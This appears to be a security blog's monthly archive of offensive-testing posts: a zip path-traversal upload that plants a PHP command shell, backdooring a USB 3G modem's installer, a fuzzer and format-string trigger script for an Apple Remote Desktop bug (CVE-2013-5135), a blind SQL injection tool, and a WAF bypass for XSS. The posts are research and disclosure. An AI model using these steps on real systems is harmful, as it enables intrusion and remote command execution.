Monthly Archives: January 2014

Compressed file upload and command execution

In this post I would like to share some experiences of a web application hacking project. After I got access to the admin section of the web application I realized that there is a file upload function available for administrators. The application properly denied uploading dynamic scripts (eg.: .php) and it was not possible to bypass this defense. However, the upload function supported compressed file upload and provided automatic decompression also but unfortunately the upload directory did not allow to run PHP files.

One could easily assume that this setup protects from OS-level command execution via malicious file uploads but unfortunately this is not true. Since ZIP archive format supports hierarchical compression and we can also reference higher level directories we can escape from the safe upload directory by abusing the decompression feature of the target application.

To achieve remote command execution I took the following steps:

1. Create a PHP shell:

        $cmd = ($_REQUEST['cmd']);

2. Use “file spraying” and create a compressed zip file:

root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# ls *.php
simple-backdoor.php  xxAxxAxxAcmd.php        xxAxxAxxAxxAxxAxxAcmd.php        xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php
xxAcmd.php           xxAxxAxxAxxAcmd.php     xxAxxAxxAxxAxxAxxAxxAcmd.php     xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php
xxAxxAcmd.php        xxAxxAxxAxxAxxAcmd.php  xxAxxAxxAxxAxxAxxAxxAxxAcmd.php
root@s2crew:/tmp# zip xx*.php
  adding: xxAcmd.php (deflated 40%)
  adding: xxAxxAcmd.php (deflated 40%)
  adding: xxAxxAxxAcmd.php (deflated 40%)
  adding: xxAxxAxxAxxAcmd.php (deflated 40%)
  adding: xxAxxAxxAxxAxxAcmd.php (deflated 40%)
  adding: xxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
  adding: xxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
  adding: xxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
  adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
  adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)

3.Use a hexeditor or vi and change the “xxA” to “../”, I used vi:

:set modifiable


Only one step remained: Upload the ZIP file and let the application decompress it! If it is succeeds and the web server has sufficient privileges to write the directories there will be a simple OS command execution shell on the system:


Banging 3G rocks

I’ve always wanted to take a look at the security of 3G modem sticks but as a more “high-level” guy, I basically procrastinated the task of messing with kernel drivers and such, and settled to installing these devices into disposable virtual machines for security. 

But after I saw the presentation of Nikita Tarakanov about the modems of Huawei (slides here) I realized that many interesting things can be found out by using rather simple techniques. So I grabbed the first stick in sight and started to investigate how the userland part of its installed software works.

The stick is an ONDA Communications MF195 (product of ZTE), provided by T-Mobile. It works pretty well with Windows and OS X, unfortunately for me, I couldn’t get it to work under Linux :(

As it turns out, the situation with ZTE is quite similar to Huawei, in that they both have issues with file permissions. The installed software has numerous configuration options for external URL’s, for example, here is the content of [SW home]/Bin/UpdateCfg.ini:


And yes, this file is writable by any user, along with the main executable that is started at every login with the privileges of the logged in user creating a trivial way for local user impersonation or privilege escalation:

The “Rendszergazdák” group is the equivalent of “Administrators” in Hungarian Windows versions

We have to note though, that this is still better than Huawei’s ouc.exe that is also “world” writable and runs as a SYSTEM service…

After these little games I started to wonder if I could backdoor the stick by changing the installer. I used a different stick, an out of use ZTE K3570-Z from Vodafone for this task, because I felt that I could easily brick the MF195 which I use regularly.

The task sounds trivial: the device shows up as a USB CD-ROM drive when plugged in without the proper drivers installed, so all we have to do is to change the contents of this virtual optical drive.

But there are some problems: first of all, installation fails most of the time even with the original software that makes testing really painful. The filesystem is iso9660 that is read-only by design, so we have to first repack the FS contents before reflashing, but this should be a trivial task. The biggest problem is to force the OS to write something to a device that it knows to be a read-only CD-ROM. For this task I had to use the dc-unlocker tool that is proprietary, pirate-ish and needs paid registration (unless you find some “demo” codes on the web, that you obviously wouldn’t want to do…), so a more open solution for this would be highly appreciated.


I managed to take the fail train for about an hour because I didn’t read the instructions on the screen, so if you plan to do similar things yourself, spare yourself some time and RTFM. The COM port settings can be figured out from the device manager after the drivers are loaded, and you may also need to enable the diagnostics port using the menu option of the Unlock tab of the dc-unlocker.

 I could extract the installer image using dd, mounted the image as a loop device, changed a few things for a proof-of-concept, then created a new image using mkisofs that I wrote out using dc-unlocker (the Flash writing feature is free). In order to get the stick work again, you have to disable the diagnostics port after the new image is written out.

This way I managed to place arbitrary contents on the virtual drive of the stick. I used msfvenom to plant custom payload into the original installer so keeping the whole device working. Since the binaries supplied by the vendor/service provider is not digitally signed this change wouldn’t be noticed by the victim in a real situation.

Aside from satisfying my curiosity, this method could be used to create more convincing baits for social engineering projects, and solving the problem of potential network restrictions in one shot.

Also a malware could ensure its persistence by maintaining a copy of itself on the attached USB modems. The hard part of this latter case is that rewriting the image on the stick takes quite long (a typical image is written out in around 10 minutes), and different hardware would probably need different infection methods.

While I don’t find the discussed vulnerability particularly dangerous, portable cellular modems are great examples of the tendency that we blindly trust every hardware – no matter how easily it can be backdoored – if it has a nice casing with a vendor logo printed on it.

If you managed to extract some interesting info about your modems don’t hesitate to share it with us in the comments!


How did I find the Apple Remote Desktop bug? – CVE-2013-5135

Inspired by the Windows Remote Dektop bug (CVE-2012-0002) I created a simple  network protocol fuzzer. This is a dumb fuzzer that only changes every single byte value from 0 to 255:

import socket
import time
import struct
import string
import sys
init1 = (
"Sniffed network connection part 1"
init2 = (
"Sniffed network connection part 2"
init3= (
"Sniffed network connection part 3"
act = init3
print len(act)
for i in range(int(sys.argv[1]),len(act)):
	for j in range(0,256):
	        	hexa = string.atol(str(j))
        		buffer = struct.pack('<B',hexa)
			x = act[:i]+buffer+act[(i+len(buffer)):]
			s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
			connect=s.connect(('',5900)) # hardcoded IP address
			print str(i) + " " + str(j)
			s.send(init1) # send the data
			data = s.recv(1024)
			s.send(init2) # send the data
			data = s.recv(1024)
			s.send(x) # send the data
			data = s.recv(1024)
			j = j - 1

This approach may look especially dumb, since the Apple VNC protocol is encrypted and the changes made by the fuzzer on the bytes of the ciphertext would result in a disaster in the decrypted plaintext, but eventually this technique led to the discovery of the vulnerability. I ran this fuzzer and watched the log and the Crashreporter files. The /var/log/secure.log file contained the following lines:

Jan 14 14:52:14 computer screensharingd[26350]: Authentication: FAILED :: User Name: m?>H?iYiH3`'??

 The /Library/Log/DiagnosticsReports/ directory also contained a lot of crash files. This meant two things: I found some interesting bug right now and the screensharingd runs with root permissions (the directory above is for the crash files of the privileged processes). The Crashwrangler said this is an unexploitable crash but I don't trust this tool blindly ;)

Let's look at the crash in the debugger:

bash-3.2# while true;do for i in $( ps aux | grep -i screensharingd | grep -v grep | awk '{print $2}');do gdb --pid=$i;done;done<br />
GNU gdb 6.3.50-20050815 (Apple version gdb-1822) (Sun Aug  5 03:00:42 UTC 2012)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "x86_64-apple-darwin".No symbol table is loaded.  Use the "file" command.
/Users/depth/.gdbinit:2: Error in sourced command file:
No breakpoint number 1.
/Users/depth/30632: No such file or directory
Attaching to process 30632.
Reading symbols for shared libraries . done
Reading symbols for shared libraries .......................................................................................................................................... done
Reading symbols for shared libraries + done
0x00007fff89e8e67a in mach_msg_trap ()
(gdb) set follow-fork-mode child 
(gdb) c
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x0000000000000002
[Switching to process 30632 thread 0x2b03]
0x00007fff8e2a0321 in __vfprintf ()
(gdb) i reg
rax            0x2	2
rbx            0x10778ba5c	4420319836
rcx            0x37	55
rdx            0x10778a810	4420315152
rsi            0x7f9a22b00000	140299983650816
rdi            0x106926400	4405224448
rbp            0x10778aa40	0x10778aa40
rsp            0x10778a610	0x10778a610
r8             0x106926400	4405224448
r9             0x62	98
r10            0x1224892248900008	1307320572183576584
r11            0x10778aaa8	4420315816
r12            0xb	11
r13            0x38	56
r14            0x0	0
r15            0x6e	110
rip            0x7fff8e2a0321	0x7fff8e2a0321 <__vfprintf+3262>
eflags         0x10246	66118
cs             0x2b	43
ss             0x0	0
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0
(gdb) x/s $rbx
0x10778ba5c:	 " :: Viewer Address: :: Type: DH"

This is very interresting. I assumed "*printf" error meant a common buffer overflow or a format string attack. Let's see the problematic function:

(gdb) bt
#0  0x00007fff8e2a0321 in __vfprintf ()
#1  0x00007fff8e2ea270 in vasprintf_l ()
#2  0x00007fff8e2d9429 in asl_vlog ()
#3  0x00007fff8e27f7d4 in vsyslog ()
#4  0x00007fff8e27f879 in syslog () # Vulnerability here!
#5  0x00000001075484df in _mh_execute_header ()
#6  0x0000000107521892 in _mh_execute_header ()
#7  0x0000000107532657 in _mh_execute_header ()
#8  0x000000010752d7c1 in _mh_execute_header ()
#9  0x00007fff87c46ce6 in PrivateMPEntryPoint ()
#10 0x00007fff8e2ab8bf in _pthread_start ()
#11 0x00007fff8e2aeb75 in thread_start ()

I fired up IDA Pro and looked for the invalid authentication chain of the screensharingd binary. First I searched for the "FAILED" keyword in order to find the subroutine of interest:


But it turns out that he "Authentication FAILED" string leads us to the interesting part of code:


This string is referenced by the sub_1000322a8 function:


I followed the cross reference to the "Authentication : FAILED" string:


Yes, here is the critical part of the binary (DH authentication is the current one based on the secure.log file):


The subroutine creates the syslog message properly with format strings but before calling the syslog() function it does not sanitize the username field and the attacker can perform a format string attack. The easiest way to check this assumption is to try to authenticate using the RDP client:


And check the secure.log file:


 Great! :) This is a format string vulnerability in Apple Remote Desktop protocol. I spent a few days to investigate the vulnerability and write a working exploit with no success. The problems are:

  • null bytes in the memory addresses (64 bit architecture)
  • relative small buffer space (~2*64 bytes)
  • non executable stack

If you have any ideas on the exploitation of the issue, do not hesitate share them with me! To help you get started I wrote a simple trigger script:

# For ARD (Apple Remote Desktop) authentication you must also specify a username. 
# You must also install Crypt::GCrypt::MPI and Crypt::Random
# CVE: CVE-2013-5135
# Software: Apple Remote Desktop
# Vulnerable version: < 3.7
use Net::VNC;
$target = "";
$password = "B"x64; #max 64
$a = "A"x32; # max 64
$payload = $a."%28\$n"; # CrashWrangler output-> is_exploitable=yes:instruction_disassembly=mov    %ecx,(%rax):instruction_address=0x00007fff8e2a0321:access_type=write
print "Apple VNC Server @ $target\n";
print "Check the /var/log/secure.log file ;) \n";
$vnc = Net::VNC->new({hostname => $target, username => $payload, password => $password});

This was the whole story of CVE-2013-5135 from the beginning of 2013. Every bug hunting approach may be good way, so try something different than everybody else. Happy bug hunting!

Duncan – Expensive injections

During a web application test one of the most precious bugs you can find is a good-old SQL injection: These vulnerabilities can lead you to bypass all the security controls of the application, elevate your privileges and find new (possibly vulnerable) functionality and in the end take control over the entire database server and possibly pivot your attack to the depths of the target network.

Fortunately for the application operators SQL injection vulnerabilities are not that easy to come by thanks to the roboust development frameworks and smart testing tools. That being said, these vulnerabilities are here to stay, although many times you can only discover them the hard manual way hidden deep inside some complex feature. After the discovery, exploitation can be more painful, since information emitted by the database often disappears as it goes through the layers of the application, leaving you with a fully blind scenario. And although there are great generic tools (like SQLmap or SQLninja) to retreive meaningful information by gaining advantage of these bugs, there are many cases when configuring or even patching your favorite software takes more effort in the end than writing your specific exploit from scratch.

But we, computer people are lazy and hate to reinvent the wheel every time we stumble upon some exotic injection not to mention the debugging frenzy that a speed-coded search algorithm or a multi-threaded program can cause.

This is why I created Duncan (named after the blind, weak but loyal attendant of the Prince of Thieves) that is a simple but powerful Python program skeleton/module that saves you the work with the most daunting tasks of SQLi exploit development: it takes care of threading, implements tested search algorithms and provides a convenient command line interface (that might be an oxymoron…) for configuration. You only have to implement one single method that checks for the value of a character of a custom query result (typically this can be done in 5-8 lines of code) and you can start looting, Duncan takes care of everything else.

Good old Duncan

Time == Money

Among the simple blind injection – that was really just an exercise to clean the rust off the coder part of my brain – I also wanted to support time-based injections, which may look identical to a standard blind injection but there might be a catch:

While typical blind injections are usually exploitable through some kind of 1-bit information leak and are basically identical to the well-known number guessing game, time based injection has an interesting property, namely that you have to “pay some price” (spend considerable amount of time) every time you guess (in)correctly. Optimizing an exploit to minimize this cost sounded like a fun idea to play with, so I brought up the topic at Camp0 where we created a simple test program and some proof of concept algorithms (the algorithms are named after my participating friends, CJ and Synapse – kudos to them!).

We concluded, that as the set of possible guesses shrink, linear search gets more  beneficial than binary since in the former case the number of expensive guesses is constant (but you have to make more cheap requests overall), while in the latter case we can expect that the number of expensive requests will be proportional to the logarithm of the set size (but we have to make fewer requests overall).

So basically both implemented algorithms fall back to linear search under different conditions related to the set size and the ratio of the costs of the correct/incorrect guesses.

This works pretty well in model implementations, saving 20-30% time in average so I decided to implement a similar algorithm in Duncan too.

Unfortunately as it turned out optimizations only made a (positive) difference in some unlikely edge cases and implementing some simple auto-tuning mechanism for timing could have much bigger benefits. Luckily Duncan allows you to implement such more advanced algorithms pretty easily :)

Update 2017.01.03: After 3 years, Erick Wong from Mathematics Stack Exchange provided us with a comprehensive answer to this problem. As it turned out, “the optimized algorithm can yield significant performance gain in case the penalty is big (e.g. querying a large dataset)”

So feel free to use Duncan in your own pentest projects or experiment with more advanced algorithms, the source code along with some implementation and usage examples are available in our GitHub repository.

WAF bypass made easy

In this post I will share my testing experiences about a web application protected by a web application firewall (WAF). The investigation of the parameters of web interfaces revealed that I can perform XSS attacks in some limited ways. The target implemented blacklist-based filtering that provided some HTML tag and event handler restriction. Since this restriction appeared at quite unusual places I suspected that there might be a WAF in front of the application. To verify my suspicion:

  • I tested the interfaces by random HTTP parameters which contained XSS payload. Most of the time a WAF checks all of the input parameters but the server side validation only checks the expected ones;
  • I used the Wafit tool.

These tests underpinned my assumption: there was indeed some application level firewall in front of my target.

In order to map the filter rules I created a list of HTML4 and HTML5 tags and event handlers based on the information of After this I could easily test the allowed tags and event handlers with Burp Suite Professional:

HTML eventsHTML events (click to enlarge)


HTML tags (click to enlarge)

Based on the results we can perform only some browser specific attacks typically against IE/6.0. However, many web applications handle parameters passed by GET and POST methods in the same way. I performed the tests again, now submitting the crafted parameters in the HTTP POST body and found that the WAF didn’t interrupt my request and the application processed my input through the same vulnerable code path. This way I could perform XSS without limitation and surprisingly was able to find an SQL injection issue also.

When you try implement a WAF in your infrastructure the most important key concepts are:

  • Know your system: Collect the applications and HTTP parameters to be protected and understand how they are used (data types, expected format, etc.);
  • Consult somebody with an offensive attitude (like a penetration tester) before you implement the defense;
  • Be aware of the limits of blacklist-based filtering;

Improper WAF implementation can lead to false sense of security that can result in more damage than operating applications with known security issues.